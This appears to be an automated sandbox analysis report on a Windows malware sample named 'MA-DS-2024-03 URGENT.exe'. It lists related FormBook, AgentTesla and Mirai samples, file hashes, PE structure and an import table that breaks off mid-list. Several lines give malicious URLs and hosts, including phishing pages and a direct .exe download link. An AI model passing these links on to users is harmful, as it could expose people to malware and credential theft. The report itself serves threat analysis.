pywolwnvd.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | OgkJOmobY7.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | invoice_96.73.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 54.244.188.177
                                                       Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                       COGENT-174US | Z9lFNBiLGK.exe | malicious | DBatLoader | 198.16.88.194
                                                       - | Z9lFNBiLGK.exe | malicious | DBatLoader | 198.16.88.194
                                                       - | Recibos.exe | malicious | FormBook | 154.23.184.194
                                                       - | rebirth.arm.elf | malicious | Mirai, Okiru | 38.181.222.220
                                                       - | rebirth.spc.elf | malicious | Mirai, Okiru | 198.242.174.67
                                                       - | rebirth.arm7.elf | malicious | Mirai, Okiru | 154.61.11.142
                                                       - | rebirth.arm5.elf | malicious | Mirai, Okiru | 38.30.130.166
                                                       - | rebirth.mpsl.elf | malicious | Mirai, Okiru | 149.122.32.48
                                                       - | rebirth.mips.elf | malicious | Mirai, Okiru | 38.24.82.138
                                                       - | la.bot.m68k.elf | malicious | Mirai | 38.46.12.186
                                                       AMAZON-02US | https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.html | malicious | Unknown | 3.5.217.53
                                                       - | https://app.droplet.io/form/Ko1loy | malicious | Unknown | 3.23.93.108
                                                       - | bin.sh.elf | malicious | Unknown | 54.171.230.55
                                                       - | Request for Quotation.exe | malicious | FormBook | 18.141.10.107
                                                       - | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
                                                       - | http://abercombie.com | malicious | Unknown | 3.160.188.18
                                                       - | https://d3tl5rwi83n7i8.cloudfront.net/BMGe2dUrJpyz.exe | malicious | Unknown | 13.227.9.131
                                                       - | https://districtwharfoffices.com/l/home | malicious | Unknown | 3.164.182.25
                                                       - | https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01 | malicious | Unknown | 13.227.2.22
                                                       - | https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBU | malicious | Unknown | 108.158.75.129
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1658880
                                                      Entropy (8bit):4.312999268593951
                                                      Encrypted:false
                                                      SSDEEP:24576:kxGBcmlyVg9N9JMlDlfjRiVuVsWt5MJMs:wGy+egFIDRRAubt5M
                                                      MD5:A7B2833265E5E73E4BC1B1899D393D76
                                                      SHA1:2F1E2707A31AC5EFFD8C067CFA19F27DD39D0E2E
                                                      SHA-256:965DF3470AD9923417AC4EFB4DE87E0FF11D3E8AB97847CC876F01463BF04BF5
                                                      SHA-512:C081B719A63C383139418E3868A12BC20B309E56DB2189E12C8079BFA5928FF2C5C192C4FAC6D81E638BED5323C10704C82B8D869550B60C3957677ED1B36C09
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Reputation:low
                                                      Process:C:\Windows\SysWOW64\choice.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                      Category:modified
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1215420383712111
                                                      Encrypted:false
                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288768
                                                      Entropy (8bit):7.995845027904257
                                                      Encrypted:true
                                                      SSDEEP:6144:XPtnx0qo/dnyyKDyXlZUMyHIFBw5gWcpqEQScQ+Z8YSoxTyY4:/9xEFytOZU7BEkEQDVGNoxh4
                                                      MD5:B9AD26AFFCF5B169815866938EE844A3
                                                      SHA1:2C5BAC9CD4BE7E01786D32AD27355889F82D12F4
                                                      SHA-256:527F910B19453AA9423EA53DB1E7B81D39C18655C89519C80DD1323394F28A9B
                                                      SHA-512:BBC73EFC069BD6A5205856145DB07681F999716E51D676E7FE8D25E062F55C9A4FC18FF3537A3D6EE0CE2E41664DA82A4F5C95E554956631977CBCBCACE7624C
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):14646
                                                      Entropy (8bit):7.6318606634920965
                                                      Encrypted:false
                                                      SSDEEP:384:ITYznwlR6ovC0TD4gjTaJEXbFuI+/wT5rS3p3isCLV:IAwlooK0TMgjmJQBuI+QTsCZ
                                                      MD5:0CD1F14FED6AB1F6AA6A8BC2ECF8EC8A
                                                      SHA1:683EABB8A817BE130459DEE4F582E74E65466F85
                                                      SHA-256:A517CDF9F74A56735E092FD8F66C995389D74E1E726C8BD59FE67CEA264CB742
                                                      SHA-512:B3DE9DF2FA737AB4CB46FDDA87037E66C90EF3B9B0309008DB18E6566EA2AAC8DD58ED7067246C2235D1136E94E233E96652327BE4BB04EBAE76A979AB03A04D
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):143378
                                                      Entropy (8bit):2.9931612803905234
                                                      Encrypted:false
                                                      SSDEEP:96:AIXLr4e+F05BLMoQCs0FlRZpA6Rqk5OEGcud9IvySuE3WrWVjj3qnBaAJZdjureP:H3BjDROuZGcud9IvySuE3WrWVfqnBaA
                                                      MD5:A9DA76BB6C03093AC9DC7FDC3FD03B66
                                                      SHA1:CE87AD7C621CF4FCAD47C1ECEC3646E67C06FB81
                                                      SHA-256:523FDDFE5844D0A2EDBD709EA4760B5A9A90FE7FD2AB5A2D4F7470CC9D1DD811
                                                      SHA-512:CB2BC4A13AF0C53803CDE0D5AE31D7786E817611EE17BC55F1056C82EFEFB2516011CC8881C822C3190C1B9942A69CF5F6E25B995C94635EC67EBF658163C3F9
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288768
                                                      Entropy (8bit):7.995845027904257
                                                      Encrypted:true
                                                      SSDEEP:6144:XPtnx0qo/dnyyKDyXlZUMyHIFBw5gWcpqEQScQ+Z8YSoxTyY4:/9xEFytOZU7BEkEQDVGNoxh4
                                                      MD5:B9AD26AFFCF5B169815866938EE844A3
                                                      SHA1:2C5BAC9CD4BE7E01786D32AD27355889F82D12F4
                                                      SHA-256:527F910B19453AA9423EA53DB1E7B81D39C18655C89519C80DD1323394F28A9B
                                                      SHA-512:BBC73EFC069BD6A5205856145DB07681F999716E51D676E7FE8D25E062F55C9A4FC18FF3537A3D6EE0CE2E41664DA82A4F5C95E554956631977CBCBCACE7624C
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):12320
                                                      Entropy (8bit):7.984066687923601
                                                      Encrypted:false
                                                      SSDEEP:384:iWY8uIi/qMpaLMOV2w72wtjAWO3qA9CY/n:L5FM7OV262weWO3N9z
                                                      MD5:D271EE029E1558F5B120B8CA15878013
                                                      SHA1:D67F47B7919DDE852C6B490DBB36FCBFB4DC39F3
                                                      SHA-256:7AA21F69E444570D72B7EF861716EE97797320A8A904611853C3AAB9A9ED4C59
                                                      SHA-512:2836473C247312FDEE32BDD648F8B921B165B5D3896D5F876D76BC69A6AA13530B5281E204AB88C65DDFFE0499732C01E1865211253FF086C1E80C2DBD2C4A38
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1348608
                                                      Entropy (8bit):7.251539764816541
                                                      Encrypted:false
                                                      SSDEEP:24576:TQW4qoNUgslKNX0Ip0MgHCpoMBOuPVg9N9JMlDlfjRiVuVsWt5MJMs:TQW9BKNX0IPgiKMBOu9gFIDRRAubt5M
                                                      MD5:70844A25E3B4375DA206E6793BBE1975
                                                      SHA1:30069F665904A2ED05FEF80A0022F18CB8EB70DC
                                                      SHA-256:1CDDEBB94474C9822C9532E5D7586E9D917D240C75C317330920CA8CDDAA0301
                                                      SHA-512:C40DDC6842C13CC0CC1165CF44C716EA5AD92279BB0DA415157F51EC29E2036E7065C2FADCC6D848AEDD39B725F2EB2F9DFDD7F237139F8CCDBA6C246D139430
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:modified
                                                      Size (bytes):671232
                                                      Entropy (8bit):7.837233441090614
                                                      Encrypted:false
                                                      SSDEEP:12288:YT6G86AbHjkgV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Y2G7AbHjkMVg9N9JMlDlfjRiVuVsWt5c
                                                      MD5:02AC72471C5BA569ED1524C1BA80604D
                                                      SHA1:73C35EAACCD892E75D860E649DE88B66D84AB561
                                                      SHA-256:75D86C3333958C2DE23FAACA707FD8DB642724D4041E430E01F175408E10F9D3
                                                      SHA-512:360935F074B029D96D6B55C354E2B4B55B11F4BB733C099D527E4FA9FCC0B54EFFF39949CC84361346455533300EDF47A7BE1F3D3A17A53B87B92E018ED0A9E2
                                                      Malicious:true
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1594368
                                                      Entropy (8bit):4.175676227596535
                                                      Encrypted:false
                                                      SSDEEP:12288:mEP3RFLV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:lFBVg9N9JMlDlfjRiVuVsWt5MJMs
                                                      MD5:114ADFAB8A4E69539FC98ABAB86561C6
                                                      SHA1:8A4B074DB9453C7F8839E2A13790175017BDF0DC
                                                      SHA-256:E04ADBCAEF0E9885F235112C0050BB91A2C3FFB4ABAE230DA4FB7701FC06B52F
                                                      SHA-512:B95C6FDC8265A069360037709B0B0CA51C7E02BACE33B8431E927396329C9FD6B2E25A3174A7593140EC7664E9B9027E1DEF4E724CD59AB76B085A5A7C4CE19C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Process:C:\Windows\System32\AppVClient.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):12320
                                                      Entropy (8bit):7.985390058469798
                                                      Encrypted:false
                                                      SSDEEP:384:NvyC70d9Z456jIi5Tvxo3OECKMfD30qV0A:5Ad9Znj9T5qqKMfD3Nf
                                                      MD5:57C98A34F5313662D6E70CCAA70E8E21
                                                      SHA1:81A486D24EB2617A7A9E69F338A03E66CF9BB0FB
                                                      SHA-256:2F703FB726EABADD18B454F2D5A9B10942FEAE4DF003AE4C4325D714B5DE1665
                                                      SHA-512:BDD846584C6AFAF51338ED81721606407143D68B018ED75F9FDEEEA1D8907B414EAB72FC9A05CF0654FF6621D4F00F2C93A799728317F960E0B5EBC08FFD0A82
                                                      Malicious:false
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.505662525105906
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:MA-DS-2024-03 URGENT.exe
                                                      File size:1'762'304 bytes
                                                      MD5:b5c0bc1ca5223c4b18328235497a2ef6
                                                      SHA1:23836ce6cfd0bf6617527366879bf36fcd9d3e26
                                                      SHA256:ec01b76e956bceeec02a2bf5004ec837639562729f5ea4fd61f2f9f1ea0e803f
                                                      SHA512:3328ebf08f853074396de47469ed2aa9be47e5478cb083dfc43113b5157b0690c8bc9806c475dfa5c71aacaf52f2e848657a9b475668bfdf12ac2e2cd24ce5b7
                                                      SSDEEP:49152:3d0c++OCvkGs9FagQLJjVMYxgFIDRRAubt5M:tB3vkJ97rUf
                                                      TLSH:CC85E02273DDC361CB669173BF29B7056EBF38250630B85B2F940D7DA960172162DBA3
                                                      Icon Hash:aaf3e3e3938382a0
                                                      Entrypoint:0x427dcd
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x67584097 [Tue Dec 10 13:22:31 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                      Instruction
                                                      call 00007FF540B25E8Ah
                                                      jmp 00007FF540B18C54h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FF540B18DDAh
                                                      cmp edi, eax
                                                      jc 00007FF540B1913Eh
                                                      bt dword ptr [004C31FCh], 01h
                                                      jnc 00007FF540B18DD9h
                                                      rep movsb
                                                      jmp 00007FF540B190ECh
                                                      cmp ecx, 00000080h
                                                      jc 00007FF540B18FA4h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007FF540B18DE0h
                                                      bt dword ptr [004BE324h], 01h
                                                      jc 00007FF540B192B0h
                                                      bt dword ptr [004C31FCh], 00000000h
                                                      jnc 00007FF540B18F7Dh
                                                      test edi, 00000003h
                                                      jne 00007FF540B18F8Eh
                                                      test esi, 00000003h
                                                      jne 00007FF540B18F6Dh
                                                      bt edi, 02h
                                                      jnc 00007FF540B18DDFh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007FF540B18DE3h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007FF540B18E35h
                                                      bt esi, 03h
                                                      jnc 00007FF540B18E88h
                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD4 build 31101
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x57c8c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | 3de9cc8884ce5b00bc2079b745b786a7 | False | 0.5728679102422908 | data | 6.676133860974604 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x57c8c | 0x57e00 | 591bb4c19cdc8a0e82b18e516a6dcbb1 | False | 0.9246643847795164 | data | 7.88882752659976 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11f000 | 0x96000 | 0x95000 | 743db71085d1f9d387eba8e73a38cbc1 | False | 0.9757563443791947 | data | 7.938039574595139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x4ef54 | data | | | 1.0003277553090175
RT_GROUP_ICON | 0x11e70c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11e784 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11e798 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11e7ac | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11e7c0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11e89c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, 